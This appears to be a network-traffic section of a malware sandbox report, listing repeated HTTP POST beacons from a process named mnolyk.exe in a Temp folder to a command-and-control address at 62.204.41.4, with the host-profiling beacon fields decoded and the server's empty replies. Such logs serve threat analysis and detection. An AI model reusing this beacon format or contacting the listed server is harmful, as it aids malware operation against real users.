660	192.168.2.5	50373	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:09.942648888 CET	905	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:10.007543087 CET	905	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
661	192.168.2.5	50374	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:10.203248024 CET	906	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:10.267591953 CET	906	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
662	192.168.2.5	50375	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:10.441776037 CET	907	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:10.506551981 CET	907	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
663	192.168.2.5	50376	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:10.676242113 CET	908	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:10.743829012 CET	908	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
664	192.168.2.5	50377	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:10.926717997 CET	909	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:10.993803024 CET	909	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
665	192.168.2.5	50378	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:11.173249006 CET	910	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:11.237833023 CET	910	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
666	192.168.2.5	50379	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:11.418266058 CET	911	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:11.483059883 CET	911	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
667	192.168.2.5	50380	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:11.655903101 CET	912	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:11.717742920 CET	912	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
668	192.168.2.5	50381	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:11.899081945 CET	913	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:11.964369059 CET	913	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
669	192.168.2.5	50382	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:12.143004894 CET	914	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:12.209357977 CET	914	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.5	49773	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:22.545756102 CET	258	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:22.609993935 CET	258	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
670	192.168.2.5	50383	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:12.387972116 CET	915	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:12.450683117 CET	915	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
671	192.168.2.5	50384	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:12.627470970 CET	916	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:12.692548037 CET	916	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
672	192.168.2.5	50385	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:12.863066912 CET	917	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:12.925623894 CET	917	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
673	192.168.2.5	50386	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:13.098002911 CET	918	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:13.165216923 CET	918	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
674	192.168.2.5	50387	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:13.346041918 CET	919	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:13.411418915 CET	919	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
675	192.168.2.5	50388	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:13.583065033 CET	920	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:13.645430088 CET	920	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
676	192.168.2.5	50389	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:13.814636946 CET	921	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:13.879067898 CET	921	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
677	192.168.2.5	50390	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:14.048984051 CET	922	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:14.114309072 CET	922	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
678	192.168.2.5	50391	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:14.311491966 CET	923	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:14.375710011 CET	923	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
679	192.168.2.5	50392	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:14.550843954 CET	924	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:14.618185043 CET	924	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.5	49774	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:22.791511059 CET	259	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
